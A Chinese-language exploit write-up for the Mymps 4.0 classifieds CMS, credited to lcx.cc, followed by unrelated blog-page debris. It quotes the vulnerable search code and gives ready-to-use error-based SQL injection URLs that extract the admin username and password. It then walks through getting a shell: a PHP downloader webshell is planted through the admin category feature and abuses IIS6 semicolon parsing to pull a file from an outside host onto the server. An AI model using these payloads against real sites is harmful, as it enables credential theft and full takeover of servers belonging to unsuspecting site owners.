受影响的厂商:
www.mymps.com.cn
是否通杀:
4.0版本 其他版本为测试
漏洞产生:
mayidatainfo_posttime.php代码
省略.....
$info_posttime = array();
/*信息检索的发布时间下拉框选项*/
//注意单位为天,一周则为7,一个月则为30,以此类推
$info_posttime[0] = '不限';
$info_posttime[3] = '3天内';
$info_posttime[7] = '一周内';
$info_posttime[30] = '一个月以内';
$info_posttime[90] = '三个月以内';
?>
mayisearch.php代码
一大推....省略...
$where .= $posttime != '' ? "AND i.begintime >= (".$timestamp."-".$posttime."*3600*24)" : "";
一大推....省略...
$sql = "SELECT i.id,i.html_path,i.begintime,i.title,i.content,i.ismember,i.contact_who,i.begintime,i.catid,c.catname FROM `{$db_mymps}information` AS i LEFT JOIN `{$db_mymps}category` AS c ON i.catid = c.catid WHERE 1 {$where} {$extra_in} ORDER BY i.begintime DESC";
$search['rows_num'] = $rows_num = $db -> getOne("SELECT COUNT(i.id) FROM `{$db_mymps}information` AS i WHERE 1 {$where} {$extra_in}");//没过滤的带入查询了....
注入篇:
爆用户
http://127.0.0.1/info.php?catid=155&areaid=&posttime=3) and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,uname,0x27,0x7e)) from 前缀_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%20and%20(111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444
爆密码
http://127.0.0.1/info.php?catid=155&areaid=&posttime=3) and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,pwd,0x27,0x7e)) from 前缀_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%20and%20(111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444111111111122222222233333333334444444444
一般前缀是my 完整是my_admin
如果语句不够长自己加,太长去掉...
后台拿shell篇:
登入后台 > 栏目设置 > 新增栏目
路径存放形式:
自定义目录名
输入:iis60day.php;
栏目内容:
Hey web master,Have a nice day o.O? I hope so! HaHa
$str=file_get_contents($_GET['url']);
echo file_put_contents($_GET['file'],$str);
?>
然后关键在这里了...
扩展 > 生成网站站务 > 选择栏目中选择"关于我们" > 开始生成html
访问
http://路径/html/aboutus/iis60day.php;.html?url=http://*.144.*.*/testsec.php&file=4z1.php
文章来源于lcx.cc:蚂蚁分类信息系 0days
/> 视频:令人难以置信的水流效果 碉堡了 某站看见的,转了过来…… 原理嘛,很简单,就是一排管子滴水,组成密集的水帘。 然后通过程序控制滴水的速度、开关,就能组成各种图案,效果很屌。 简单地说,原理和打印机是一摸一样的,把打印机竖起来就是了,打印机纸上…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论